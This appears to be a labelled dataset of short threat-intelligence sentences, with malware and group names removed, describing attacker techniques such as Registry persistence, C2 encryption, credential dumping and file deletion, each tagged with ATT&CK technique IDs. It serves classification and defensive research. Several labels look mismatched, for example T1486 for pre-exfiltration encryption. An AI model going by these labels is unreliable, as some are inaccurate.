{"text1":"creates a backdoor through which remote attackers can delete files.","labels":"['T1070.004']"}
{"text1":"creates a backdoor through which remote attackers can download files and additional malware components.","labels":"['T1105']"}
{"text1":"creates a backdoor through which remote attackers can download files onto a compromised host.","labels":"['T1105']"}
{"text1":"creates a backdoor through which remote attackers can download files onto compromised hosts.","labels":"['T1105']"}
{"text1":"creates a backdoor through which remote attackers can inject files into running processes.","labels":"['T1055']"}
{"text1":"creates a backdoor through which remote attackers can load and call DLL functions.","labels":"['T1129']"}
{"text1":"creates a backdoor through which remote attackers can monitor services.","labels":"['T1007']"}
{"text1":"creates a backdoor through which remote attackers can obtain data from local systems.","labels":"['T1005']"}
{"text1":"creates a backdoor through which remote attackers can retrieve a list of running processes.","labels":"['T1057']"}
{"text1":"creates a backdoor through which remote attackers can retrieve files.","labels":"['T1005']"}
{"text1":"creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.","labels":"['T1082']"}
{"text1":"creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.","labels":"['T1016']"}
{"text1":"creates a backdoor through which remote attackers can retrieve lists of files.","labels":"['T1083']"}
{"text1":"creates a backdoor through which remote attackers can retrieve lists of running processes.","labels":"['T1057']"}
{"text1":"creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.","labels":"['T1012']"}
{"text1":"creates a backdoor through which remote attackers can start a remote shell.","labels":"['T1059']"}
{"text1":"creates a directory, %USERPROFILE%\\AppData\\Local\\SKC\\, which is used to store collected log files.","labels":"['T1074']"}
{"text1":"creates a Launch Agent on macOS.","labels":"['T1543.001']"}
{"text1":"creates and uses a VBScript as part of its persistent execution.","labels":"['T1064']"}
{"text1":"creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d","labels":"['T1036']"}
{"text1":"creates a new service named \u201cntssrv\u201d to execute the payload.","labels":"['T1569.002', 'T1543.003']"}
{"text1":"creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.","labels":"['T1543.003']"}
{"text1":"creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.","labels":"['T1056']"}
{"text1":"creates a new Windows service with the malicious executable for persistence.","labels":"['T1543.003']"}
{"text1":"creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.","labels":"['T1547.001']"}
{"text1":"creates a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"creates a Registry subkey that registers a new service.","labels":"['T1543.003', 'T1112']"}
{"text1":"creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. 's backdoor also enables remote attackers to modify and delete subkeys.","labels":"['T1112']"}
{"text1":"creates a scheduled task to establish by executing a malicious payload every subsequent minute.","labels":"['T1053.005']"}
{"text1":"creates a scheduled task to maintain persistence on the victim\u2019s machine.","labels":"['T1053.005']"}
{"text1":"creates a scheduled task to run itself every three minutes.","labels":"['T1053.005']"}
{"text1":"creates a shortcut file and saves it in a Startup folder to establish persistence.","labels":"['T1547.009', 'T1547.001']"}
{"text1":"creates a suspended svchost process and injects its DLL into it.","labels":"['T1055']"}
{"text1":"creates a Windows service to establish persistence.","labels":"['T1543.003']"}
{"text1":"creates folders to store output from batch scripts prior to sending the information to its C2 server.","labels":"['T1074']"}
{"text1":"creates new services to establish persistence.","labels":"['T1543.003']"}
{"text1":"creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().","labels":"['T1106']"}
{"text1":"creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.","labels":"['T1112']"}
{"text1":"creates Registry keys to allow itself to run as various services.","labels":"['T1543.003']"}
{"text1":"creates run key Registry entries pointing to malicious DLLs dropped to disk.","labels":"['T1547.001']"}
{"text1":"creates scheduled tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"creates the following Registry entry: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia.","labels":"['T1547.001']"}
{"text1":"creates then deletes log files during installation of itself as a service.","labels":"['T1070.004']"}
{"text1":"creates valid users to provide access to the system.","labels":"['T1078']"}
{"text1":"creates various subdirectories under %Temp%\\reports\\% and copies files to those subdirectories. It also creates a folder at C:\\Users\\<Username>\\AppData\\Roaming\\Microsoft\\store to store screenshot JPEG files.","labels":"['T1074']"}
{"text1":"credential stealer ZUMKONG emails credentials from the victim using HTTP POST requests.","labels":"['T1095']"}
{"text1":"Data captured by  is placed in a temporary file under a directory named \"memdump\".","labels":"['T1074']"}
{"text1":"Data  copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.","labels":"['T1486']"}
{"text1":"decodes an embedded configuration using XOR.","labels":"['T1140']"}
{"text1":"decodes Base64 strings and decrypts strings using a custom XOR algorithm.","labels":"['T1140']"}
{"text1":"decodes embedded XOR strings.","labels":"['T1140']"}
{"text1":"decodes strings in the malware using XOR and RC4.","labels":"['T1140']"}
{"text1":"decrypts and extracts a copy of its main DLL payload when executing.","labels":"['T1140']"}
{"text1":"decrypts code, strings, and commands to use once it's on the victim's machine.","labels":"['T1140']"}
{"text1":"decrypts resources needed for targeting the victim.","labels":"['T1140']"}
{"text1":"deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.","labels":"['T1070.004']"}
{"text1":"deleted the DLL dropper from the victim\u2019s machine to cover their tracks.","labels":"['T1070.004']"}
{"text1":"deletes content from C2 communications that was saved to the user's temporary directory.","labels":"['T1070.004']"}
{"text1":"deletes data in a way that makes it unrecoverable.","labels":"['T1070.004']"}
{"text1":"deletes files using DeleteFileW API call.","labels":"['T1070.004']"}
{"text1":"deletes one of its files, 2.hwp, from the endpoint after establishing persistence.","labels":"['T1070.004']"}
{"text1":"deletes shadow copies from the victim.","labels":"['T1070.004']"}
{"text1":"deletes the original dropped file from the victim.","labels":"['T1070.004']"}
{"text1":"deletes the Registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open.","labels":"['T1112']"}
{"text1":"delivered  to victims via a compromised legitimate website.","labels":"['T1189']"}
{"text1":"deobfuscates its strings and APIs once its executed.","labels":"['T1140']"}
{"text1":"DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.","labels":"['T1486']"}
{"text1":"determines a working directory where it stores all the gathered data about the compromised machine.","labels":"['T1074']"}
{"text1":"digitally signed an executable with a stolen certificate from legitimate company AI Squared.","labels":"['T1553.002']"}
{"text1":"discovers information about the infected machine.","labels":"['T1082']"}
{"text1":"discovers shares on the network","labels":"['T1135']"}
{"text1":"discovers the current domain information.","labels":"['T1016']"}
{"text1":"disguised its malicious binaries with several layers of obfuscation, including encrypting the files.","labels":"['T1027']"}
{"text1":"DLL file and non-malicious decoy file are encrypted with RC4.","labels":"['T1027']"}
{"text1":"DLL side-loading has been used to execute  through a legitimate Citrix executable ssonsvr.exe which is vulnerable to the technique. The Citrix executable was dropped along with  by the dropper.","labels":"['T1574.002']"}
{"text1":"downloaded and launched code within a SCT file.","labels":"['T1064']"}
{"text1":"downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.","labels":"['T1027.001']"}
{"text1":"downloads additional files from C2 servers.","labels":"['T1105']"}
{"text1":"downloads additional files that are base64-encoded and encrypted with another cipher.","labels":"['T1027']"}
{"text1":"downloads additional payloads.","labels":"['T1105']"}
{"text1":"downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.","labels":"['T1105']"}
{"text1":"downloads and executes additional PowerShell code and Windows binaries.","labels":"['T1105']"}
{"text1":"downloads and executes PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"downloads and installs Tor via homebrew.","labels":"['T1090.003']"}
{"text1":"downloads and uploads files on the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"downloads a new version of itself once it has installed. It also downloads additional plugins.","labels":"['T1105']"}
{"text1":"downloads an executable and injects it directly into a new process.","labels":"['T1055']"}
{"text1":"downloads a PowerShell script that decodes to a typical shellcode loader.","labels":"['T1059.001']"}
{"text1":"downloads encoded payloads and decodes them on the victim.","labels":"['T1140']"}
{"text1":"downloads files onto infected hosts.","labels":"['T1105']"}
{"text1":"downloads several additional files and saves them to the victim's machine.","labels":"['T1105']"}
{"text1":"dropped and executed SecretsDump and CrackMapExec, tools that can dump password hashes.","labels":"['T1003']"}
{"text1":"dropped and executed tools used for password cracking, including Hydra.","labels":"['T1110']"}
{"text1":"dropper creates VBS scripts on the victim\u2019s machine.","labels":"['T1064']"}
{"text1":"Droppers used by  use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 \u2013 0xAF to obfuscate payloads.","labels":"['T1027']"}
{"text1":"drops a signed Microsoft DLL to disk.","labels":"['T1553.002']"}
{"text1":"drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro.","labels":"['T1140']"}
{"text1":"drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.","labels":"['T1092']"}
{"text1":"dumped the login data database from \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.","labels":"['T1003']"}
{"text1":"dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.","labels":"['T1005']"}
{"text1":"dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.","labels":"['T1003']"}
{"text1":"During execution,  malware deobfuscates and decompresses code that was encoded with Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","labels":"['T1140']"}
{"text1":"During its initial execution,  extracts operating system information from the infected host.","labels":"['T1082']"}
{"text1":"During the  installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.","labels":"['T1574.002']"}
{"text1":"Each time a new drive is inserted,  generates a list of all files on the drive and stores it in an encrypted file.","labels":"['T1119']"}
{"text1":"embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.","labels":"['T1204']"}
{"text1":"embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened. The actors also used batch scripting.","labels":"['T1064']"}
{"text1":"employs the same encoding scheme as  for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.","labels":"['T1486']"}
{"text1":"enables remote interaction and can obtain additional code over HTTPS GET and POST requests.","labels":"['T1071']"}
{"text1":"enables the Remote Desktop Protocol for persistence.","labels":"['T1021.001']"}
{"text1":"encapsulates traffic in multiple layers of encryption.","labels":"['T1573']"}
{"text1":"encoded C2 traffic with base64.","labels":"['T1132']"}
{"text1":"encodes C2 beacons using XOR.","labels":"['T1573']"}
{"text1":"encodes C2 traffic with base64.","labels":"['T1132']"}
{"text1":"encodes C2 traffic with Base64.","labels":"['T1132']"}
{"text1":"encodes commands from the control server using a range of characters and gzip.","labels":"['T1132']"}
{"text1":"encodes communications to the C2 server in Base64.","labels":"['T1132']"}
{"text1":"encodes files before exfiltration.","labels":"['T1132']"}
{"text1":"encodes files in Base64.","labels":"['T1027']"}
{"text1":"encrypted a .dll payload using RTL and a custom encryption algorithm.  has also obfuscated payloads with base64, XOR, and RC4.","labels":"['T1027']"}
{"text1":"encrypts C2 communications with RC4 as well as TLS.","labels":"['T1573']"}
{"text1":"encrypts C2 content with XOR using a single byte, 0x12.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic using AES with a static key.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic using an RC4 key.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic using RC4 with a static key.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic with AES and RSA.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic with HTTPS and also encodes it with a single-byte XOR key.","labels":"['T1573']"}
{"text1":"encrypts collected data using a single byte XOR key.","labels":"['T1486']"}
{"text1":"encrypts command and control communications with RC4.","labels":"['T1573']"}
{"text1":"encrypts data sent to its C2 server over HTTP with RC4.","labels":"['T1573']"}
{"text1":"encrypts exfiltrated data with RC4.","labels":"['T1573']"}
{"text1":"encrypts several of its files, including configuration files.","labels":"['T1027']"}
{"text1":"encrypts some C2 traffic with the Blowfish cipher.","labels":"['T1573']"}
{"text1":"encrypts some of its files with XOR.","labels":"['T1027']"}
{"text1":"encrypts strings in the backdoor using a custom XOR algorithm.","labels":"['T1027']"}
{"text1":"encrypts strings to make analysis more difficult.","labels":"['T1027']"}
{"text1":"encrypts the collected files using 3-DES.","labels":"['T1486']"}
{"text1":"encrypts the message body of HTTP traffic with RC2 (in CBC mode) and Base64 encoding.","labels":"['T1573']"}
{"text1":"encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.","labels":"['T1486']"}
{"text1":"enumerates directories and obtains file attributes on a system.","labels":"['T1083']"}
{"text1":"enumerates directories and scans for certain files.","labels":"['T1083']"}
{"text1":"enumerates local and domain users","labels":"['T1087']"}
{"text1":"enumerates the current network connections similar to  net use .","labels":"['T1049']"}
{"text1":"established persistence by adding a Shell value under the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion]Winlogon.","labels":"['T1547.004']"}
{"text1":"establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.","labels":"['T1547.008']"}
{"text1":"establishes persistence by adding a new service with the display name \"WMI Performance Adapter Extension\" in an attempt to masquerade as a legitimate WMI service.","labels":"['T1036']"}
{"text1":"establishes persistence by adding a Registry Run key.","labels":"['T1547.001']"}
{"text1":"establishes persistence by creating a shortcut.","labels":"['T1547.009']"}
{"text1":"establishes persistence by creating a shortcut in the Windows startup folder to run a script each time the user logs in.","labels":"['T1547.009']"}
{"text1":"establishes persistence by creating the Registry key HKCU\\Software\\Microsoft\\Windows\\Run.","labels":"['T1547.001']"}
{"text1":"establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.","labels":"['T1543.003']"}
{"text1":"establishes persistence in the Startup folder.","labels":"['T1547.001']"}
{"text1":"establishes persistence through a Registry Run key.","labels":"['T1547.001']"}
{"text1":"establishes persistence under the Registry key HKCU\\Software\\Run auto_update.","labels":"['T1547.001']"}
{"text1":"examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.","labels":"['T1134']"}
{"text1":"executes a batch script to store discovery information in %TEMP%\\info.dat and then uploads the temporarily file to the remote C2 server.","labels":"['T1119']"}
{"text1":"executes a binary on the system and logs the results into a temp file by using: cmd.exe \/c \"<file_path> > %temp%\\PM* .tmp 2>&1\".","labels":"['T1059']"}
{"text1":"executes additional Jscript and VBScript code on the victim's machine.","labels":"['T1064']"}
{"text1":"executes and stores obfuscated Perl scripts.","labels":"['T1027']"}
{"text1":"executes BAT and VBS scripts.","labels":"['T1064']"}
{"text1":"executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.","labels":"['T1059']"}
{"text1":"executes cmd.exe to provide a reverse shell to adversaries.","labels":"['T1059']"}
{"text1":"executes commands remotely on the infected host.","labels":"['T1059']"}
{"text1":"executes commands remotely via cmd.exe.","labels":"['T1059']"}
{"text1":"executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands.","labels":"['T1059']"}
{"text1":"executes functions using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"executes ipconfig \/all after initial communication is made to the remote server.","labels":"['T1016']"}
{"text1":"executes net start after initial communication is made to the remote server.","labels":"['T1007']"}
{"text1":"executes net user after initial communication is made to the remote server.","labels":"['T1087']"}
{"text1":"executes payloads using the Windows API call CreateProcessW().","labels":"['T1106']"}
{"text1":"executes shellcode and a script to decode Base64 strings.","labels":"['T1064']"}
{"text1":"executes systeminfo after initial communication is made to the remote server.","labels":"['T1082']"}
{"text1":"executes the netstat -ano command.","labels":"['T1049']"}
{"text1":"executes  using PowerShell and can also perform pass-the-ticket and use Lazagne for harvesting credentials.","labels":"['T1003']"}
{"text1":"executes using regsvr32.exe called from the  persistence mechanism.","labels":"['T1218.010']"}
{"text1":"exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.","labels":"['T1048']"}
{"text1":"exfiltrates command output and collected files to its C2 server in 1500-byte blocks.","labels":"['T1030']"}
{"text1":"exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.","labels":"['T1048']"}
{"text1":"exfiltrates data in compressed chunks if a message is larger than 4096 bytes .","labels":"['T1030']"}
{"text1":"exfiltrates data over the same channel used for C2.","labels":"['T1041']"}
{"text1":"exfiltrates data using cookie values that are Base64-encoded.","labels":"['T1132']"}
{"text1":"exfiltrates screenshot files to its C2 server.","labels":"['T1041']"}
{"text1":"extracts and decrypts stage 3 malware, which is stored in encrypted resources.","labels":"['T1140']"}
{"text1":"Find-AVSignature AntivirusBypass module can be used to locate single byte anti-virus signatures.","labels":"['T1027.005']"}
{"text1":"finds a specified directory, lists the files and metadata about those files.","labels":"['T1083']"}
{"text1":"first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.","labels":"['T1008']"}
{"text1":"first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.","labels":"['T1027']"}
{"text1":"Following data collection,  has compressed log files into a ZIP archive prior to staging and exfiltration.","labels":"['T1560']"}
{"text1":"Following exploitation with  malware,  actors created a file containing a list of commands to be executed on the compromised computer.","labels":"['T1059']"}
{"text1":"For all non-removable drives on a victim,  executes automated collection of certain files for later exfiltration.","labels":"['T1119']"}
{"text1":"For early  versions, the compilation timestamp was faked.","labels":"['T1070.006']"}
{"text1":"gains persistence by adding the Registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce.","labels":"['T1547.001']"}
{"text1":"gathered information and files from local directories for exfiltration.","labels":"['T1005']"}
{"text1":"gathers and beacons the operating system build number and CPU Architecture (32-bit\/64-bit) during installation.","labels":"['T1082']"}
{"text1":"gathers and beacons the system time during installation.","labels":"['T1124']"}
{"text1":"gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.","labels":"['T1033']"}
{"text1":"gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.","labels":"['T1082']"}
{"text1":"gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.","labels":"['T1082']"}
{"text1":"gathers domain and account names\/information through process monitoring.","labels":"['T1087']"}
{"text1":"gathers file and directory information from the victim\u2019s machine.","labels":"['T1083']"}
{"text1":"gathers information about local groups and members.","labels":"['T1069']"}
{"text1":"gathers information about network adapters.","labels":"['T1016']"}
{"text1":"gathers information about opened windows.","labels":"['T1010']"}
{"text1":"gathers information about the Registry.","labels":"['T1012']"}
{"text1":"gathers information on local groups and members on the victim\u2019s machine.","labels":"['T1087']"}
{"text1":"gathers information on users.","labels":"['T1033']"}
{"text1":"gathers product names from the Registry key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName and the processor description from the Registry key HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0 ProcessorNameString.","labels":"['T1012']"}
{"text1":"gathers system configuration information.","labels":"['T1082']"}
{"text1":"gathers system information, network addresses, disk type, disk free space, and the operation system version.","labels":"['T1082']"}
{"text1":"gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command systeminfo.","labels":"['T1082']"}
{"text1":"gathers the computer name and checks the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.","labels":"['T1082']"}
{"text1":"gathers the current domain the victim system belongs to.","labels":"['T1016']"}
{"text1":"gathers the IP address and domain from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"gathers the local system time from the victim\u2019s machine.","labels":"['T1124']"}
{"text1":"gathers the Mac address, IP address, and the network adapter information from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"gathers the MAC address of the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.","labels":"['T1082']"}
{"text1":"gathers the OS version, CPU type, amount of RAM available from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"gathers the OS version, logical drives information, processor information, and volume information.","labels":"['T1082']"}
{"text1":"gathers the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.","labels":"['T1082']"}
{"text1":"gathers the victim's IP address and domain information, and then sends it to its C2 server.","labels":"['T1016']"}
{"text1":"gathers the victim username.","labels":"['T1033']"}
{"text1":"gathers the victim\u2019s IP address via the ipconfig -all command.","labels":"['T1016']"}
{"text1":"gathers user names from infected hosts.","labels":"['T1033']"}
{"text1":"gathers volume drive information and system information.","labels":"['T1082']"}
{"text1":"Get-Keystrokes Exfiltration module can log keystrokes.","labels":"['T1056']"}
{"text1":"Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token.","labels":"['T1087']"}
{"text1":"Get-ProcessTokenPrivilege Privesc-PowerUp module can enumerate privileges for a given process.","labels":"['T1057']"}
{"text1":"gets an output of running processes using the tasklist command.","labels":"['T1057']"}
{"text1":"had exploited multiple vulnerabilities for execution, including Microsoft\u2019s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, and CVE-2017-0199.","labels":"['T1203']"}
{"text1":"harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).","labels":"['T1003']"}
{"text1":"has 2 methods for elevating integrity. It can bypass UAC through eventvwr.exe and sdclt.exe.","labels":"['T1548.002']"}
{"text1":"has a built-in keylogger.","labels":"['T1056']"}
{"text1":"has a built-in module for port scanning.","labels":"['T1046']"}
{"text1":"has a built-in utility command for netstat, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.","labels":"['T1049']"}
{"text1":"has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).","labels":"['T1070.004']"}
{"text1":"has a command to collect the victim's IP address.","labels":"['T1016']"}
{"text1":"has a command to conduct timestomping by setting a specified file\u2019s timestamps to match those of a system file in the System32 directory.","labels":"['T1070.006']"}
{"text1":"has a command to create a reverse shell.","labels":"['T1059']"}
{"text1":"has a command to delete a file and deletes files after they have been successfully uploaded to C2 servers.","labels":"['T1070.004']"}
{"text1":"has a command to delete files.","labels":"['T1070.004']"}
{"text1":"has a command to delete its Registry key and scheduled task.","labels":"['T1070.004']"}
{"text1":"has a command to disable routing and the Firewall on the victim\u2019s machine.","labels":"['T1562.001']"}
{"text1":"has a command to download a file.","labels":"['T1105']"}
{"text1":"has a command to download a file from the C2 server to the victim mobile device's SD card.","labels":"['T1105']"}
{"text1":"has a command to download a file to the system from its C2 server.","labels":"['T1105']"}
{"text1":"has a command to download an .exe and use process hollowing to inject it into a new process.","labels":"['T1055.012']"}
{"text1":"has a command to download and execute an additional file.","labels":"['T1105']"}
{"text1":"has a command to download and executes additional files.","labels":"['T1105']"}
{"text1":"has a command to edit the Registry on the victim\u2019s machine.","labels":"['T1112']"}
{"text1":"has a command to gather system information from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"has a command to get text of the current foreground window.","labels":"['T1010']"}
{"text1":"has a command to get the victim's domain and NetBIOS name.","labels":"['T1016']"}
{"text1":"has a command to list account information on the victim\u2019s machine.","labels":"['T1087']"}
{"text1":"has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.","labels":"['T1018']"}
{"text1":"has a command to list its directory and logical drives.","labels":"['T1083']"}
{"text1":"has a command to list the victim's processes.","labels":"['T1057']"}
{"text1":"has a command to obtain a directory listing.","labels":"['T1083']"}
{"text1":"has a command to obtain a process listing.","labels":"['T1057']"}
{"text1":"has a command to retrieve information about connected users.","labels":"['T1087']"}
{"text1":"has a command to retrieve metadata for files on disk as well as a command to list the current working directory.","labels":"['T1083']"}
{"text1":"has a command to return a list of running processes.","labels":"['T1057']"}
{"text1":"has a command to set certain attributes such as creation\/modification timestamps on files.","labels":"['T1070.006']"}
{"text1":"has a command to take a screenshot and send it to the C2 server.","labels":"['T1113']"}
{"text1":"has a command to upload a file to the victim machine.","labels":"['T1105']"}
{"text1":"has a command to upload information about all running processes to its C2 server.","labels":"['T1057']"}
{"text1":"has a command to upload to its C2 server victim browser bookmarks.","labels":"['T1217']"}
{"text1":"has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.","labels":"['T1082']"}
{"text1":"has a command to write random data across a file and delete it.","labels":"['T1070.004']"}
{"text1":"has added persistence via the Registry key HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\.","labels":"['T1547.001']"}
{"text1":"has added Registry Run keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key.","labels":"['T1547.001']"}
{"text1":"has a function for decrypting data containing C2 configuration information.","labels":"['T1140']"}
{"text1":"has a keylogger.","labels":"['T1056']"}
{"text1":"has a module for loading and executing PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"has a module for performing remote desktop access.","labels":"['T1021.001']"}
{"text1":"has a module to clear event logs with PowerShell.","labels":"['T1070']"}
{"text1":"has a package that collects documents from any inserted USB sticks.","labels":"['T1025']"}
{"text1":"has a plugin that can perform ARP scanning as well as port scanning.","labels":"['T1046']"}
{"text1":"has a plugin to detect active drivers of some security products.","labels":"['T1518.001']"}
{"text1":"has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.","labels":"['T1068']"}
{"text1":"has a tool called CANDYKING to capture a screenshot of user's desktop.","labels":"['T1113']"}
{"text1":"has a tool that can copy files to remote machines.","labels":"['T1105']"}
{"text1":"has a tool that can detect the existence of remote systems.","labels":"['T1018']"}
{"text1":"has a tool that can enumerate current network connections.","labels":"['T1049']"}
{"text1":"has a tool that can enumerate the permissions associated with Windows groups.","labels":"['T1069']"}
{"text1":"has a tool that can list out currently running processes.","labels":"['T1057']"}
{"text1":"has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome.","labels":"['T1552.001']"}
{"text1":"has a tool that can run DLLs.","labels":"['T1218.011']"}
{"text1":"has a tool that exfiltrates data over the C2 channel.","labels":"['T1041']"}
{"text1":"has a tool that looks for files and directories on the local file system.","labels":"['T1083']"}
{"text1":"has attached a malicious document to an email to gain initial access.","labels":"['T1598.002']"}
{"text1":"has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.","labels":"['T1204']"}
{"text1":"has attempted to get users to execute malware via social media and spearphishing emails.","labels":"['T1204']"}
{"text1":"has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.","labels":"['T1204']"}
{"text1":"has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.","labels":"['T1204']"}
{"text1":"has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.","labels":"['T1204']"}
{"text1":"has attempted to get victims to open malicious files sent via email as part of spearphishing campaigns.","labels":"['T1204']"}
{"text1":"has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.","labels":"['T1204']"}
{"text1":"has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.","labels":"['T1204']"}
{"text1":"has attempted to map to C$ on enumerated hosts to test the scope of their current credentials\/context.","labels":"['T1021.002']"}
{"text1":"has beaconed to its C2 over port 443.","labels":"['T1043']"}
{"text1":"has been delivered through compromised sites acting as watering holes.","labels":"['T1189']"}
{"text1":"has been known to add created accounts to local admin groups to maintain elevated access.","labels":"['T1098']"}
{"text1":"has been known to brute force password hashes to be able to leverage plain text credentials.","labels":"['T1110']"}
{"text1":"has been known to create or enable accounts, such as support_388945a0.","labels":"['T1136']"}
{"text1":"has been known to pack their tools.","labels":"['T1027.002']"}
{"text1":"has been known to remove indicators of compromise from tools.","labels":"['T1027.005']"}
{"text1":"has been known to stage files for exfiltration in a single location.","labels":"['T1074']"}
{"text1":"has been known to use credential dumping.","labels":"['T1003']"}
{"text1":"has been known to use multiple backdoors per campaign.","labels":"['T1108']"}
{"text1":"has been launched by starting iexplore.exe and replacing it with 's payload.","labels":"['T1055.012']"}
{"text1":"has been loaded onto Exchange servers and disguised as an ISAPI filter (DLL file). The IIS w3wp.exe process then loads the malicious DLL.","labels":"['T1574.002']"}
{"text1":"has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the registry run key location: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe","labels":"['T1547.001']"}
{"text1":"has been observed being used to download  and the Cobalt Strike Beacon payload onto victims.","labels":"['T1105']"}
{"text1":"has been observed using SQL injection to gain access to systems.","labels":"['T1190']"}
{"text1":"has been packed with the UPX packer.","labels":"['T1027.002']"}
{"text1":"has been used to decode binaries hidden inside certificate files as Base64 information.","labels":"['T1140']"}
{"text1":"has been used to execute remote commands.","labels":"['T1059']"}
{"text1":"has built in commands to identify a host\u2019s IP address and find out other network configuration settings by viewing connected sessions.","labels":"['T1016']"}
{"text1":"has bypassed UAC.","labels":"['T1548.002']"}
{"text1":"has checked for the local admin group domain admin group and Exchange Trusted Subsystem groups using the commands net group Exchange Trusted Subsystem \/domain and net group domain admins \/domain.","labels":"['T1069']"}
{"text1":"has cleared logs during post compromise cleanup activities.","labels":"['T1070']"}
{"text1":"has cleared select event log entries.","labels":"['T1070']"}
{"text1":"has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.","labels":"['T1083']"}
{"text1":"has collected data from victims' local systems.","labels":"['T1005']"}
{"text1":"has collected emails from victim Microsoft Exchange servers.","labels":"['T1114']"}
{"text1":"has collected files from a local victim.","labels":"['T1005']"}
